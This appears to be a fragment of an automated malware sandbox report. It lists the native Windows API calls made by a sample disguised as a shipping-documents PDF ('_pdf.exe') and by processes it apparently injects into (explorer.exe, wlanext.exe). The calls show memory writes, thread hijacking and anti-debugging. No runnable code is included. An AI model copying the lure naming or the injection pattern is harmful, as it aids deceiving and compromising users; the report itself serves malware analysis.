      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0D0F NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F91CF NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F89EB NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3A46 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0A5C NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9A7A NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3A82 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3AAE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9AB1 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3AEC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9AE5 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F36F7 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9B0D NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3B08 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9B4B NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3744 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3B40 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F2FAB NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F37A1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9BB3 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3BCE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F97DC NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9BEE NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F37EC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3C06 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9804 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F982F NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9C2E NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3828 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3C6F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F988A NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F989B NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9C99 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3CC8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9CDC NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F98D4 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F38E4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F24E2 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F38F0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F090E NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F990D NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9D09 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0905 NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F451B NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F0517 NtSetInformationThread,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3D3C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9941 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F395C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F996B NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F097E NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9D74 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3D8C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9998 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3191 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F39A2 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F55B8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9DB7 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F09CD NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F99D3 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F9DEB NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F3DE9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F79FD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F41FB NtSetInformationThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E95D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A10 NtQuerySection,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E96D0 NtCreateKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EA710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EA770 NtOpenThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9760 NtOpenProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EA3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9FE0 NtCreateMutant,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EB040 NtSuspendThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E98A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3EAD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9560 NtWriteFile,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E9950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E95F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E99D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056451B LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005691CF NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056322E TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632C6 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005697D3 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564395 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564441 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569804 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056443B LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569C2E NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056982F NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005698D4 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569CDC NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005644EE LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564490 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056989B NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569C99 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056988A NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569941 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569D74 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056456E LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056996B NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056450E LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056990D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569D09 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564522 NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005699D3 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569DEB NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00563191 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569998 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569DB7 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00564654 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00563246 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569A7A NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_0056462E LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569AE5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005632E9 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00563288 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569AB1 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569B4B NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00563349 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569B0D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005697DC NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569BEE NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00569BB3 NtQueryInformationProcess,
      Source: C:\Windows\explorer.exeCode function: 3_2_061F4A32 NtCreateFile,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035499A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035496D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035496E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035495D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035499D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035498F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035498A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035497A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549560 NtWriteFile,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0354AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03549520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035495F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69DF0 NtReadFile,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69D40 NtCreateFile,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69E70 NtClose,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69F20 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69D3B NtCreateFile,
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00C69E6A NtClose,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C6E30
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E472EF7
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4722AE
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E472B28
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DEBB0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46DBD2
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E471FF1
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B841F
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461002
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB090
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4720A8
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E471D55
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A0D20
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AF900
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E472D07
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4725DD
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BD5E0
      Source: C:\Windows\explorer.exeCode function: 3_2_061F4A32
      Source: C:\Windows\explorer.exeCode function: 3_2_061EB072
      Source: C:\Windows\explorer.exeCode function: 3_2_061F7A6F
      Source: C:\Windows\explorer.exeCode function: 3_2_061EB069
      Source: C:\Windows\explorer.exeCode function: 3_2_061F3862
      Source: C:\Windows\explorer.exeCode function: 3_2_061ECCF2
      Source: C:\Windows\explorer.exeCode function: 3_2_061ECCEC
      Source: C:\Windows\explorer.exeCode function: 3_2_061EFB1F
      Source: C:\Windows\explorer.exeCode function: 3_2_061F7B0E
      Source: C:\Windows\explorer.exeCode function: 3_2_061F2132
      Source: C:\Windows\explorer.exeCode function: 3_2_061EFB22
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AB40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D2B28
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C03DA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CDBD2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353EBB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BFA2B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D22AE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350F900
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C1002
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035DE824
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D28EC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B090
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D20A8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035DDFCE
